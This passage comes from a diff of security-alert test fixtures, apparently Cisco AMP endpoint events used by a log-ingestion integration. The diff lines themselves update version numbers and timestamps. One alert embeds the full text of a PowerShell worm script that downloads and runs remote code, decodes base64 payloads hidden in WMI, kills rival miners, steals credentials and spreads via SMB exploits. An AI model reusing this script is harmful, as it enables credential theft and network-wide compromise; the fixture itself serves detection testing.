         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) \",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. 
All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "id": "6880683125978957000", "kind": "alert" @@ -2600,7 +2600,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2620,7 +2620,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500191289Z", + "ingested": "2021-09-13T18:07:28.111198245Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2675,7 +2675,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2695,7 +2695,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500193359Z", + "ingested": "2021-09-13T18:07:28.111200321Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2750,7 +2750,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2770,7 +2770,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500195409Z", + "ingested": "2021-09-13T18:07:28.111202401Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2825,7 +2825,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2845,7 +2845,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500197554Z", + "ingested": "2021-09-13T18:07:28.111204552Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2902,7 +2902,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2926,7 +2926,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500199614Z", + "ingested": "2021-09-13T18:07:28.111206627Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2981,7 +2981,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3005,7 +3005,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500201691Z", + "ingested": "2021-09-13T18:07:28.111208689Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3060,7 +3060,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3084,7 +3084,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500203753Z", + "ingested": "2021-09-13T18:07:28.111210770Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3139,7 +3139,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3163,7 +3163,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500205814Z", + "ingested": "2021-09-13T18:07:28.111212848Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3218,7 +3218,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3242,7 +3242,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500207872Z", + "ingested": "2021-09-13T18:07:28.111214921Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3297,7 +3297,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
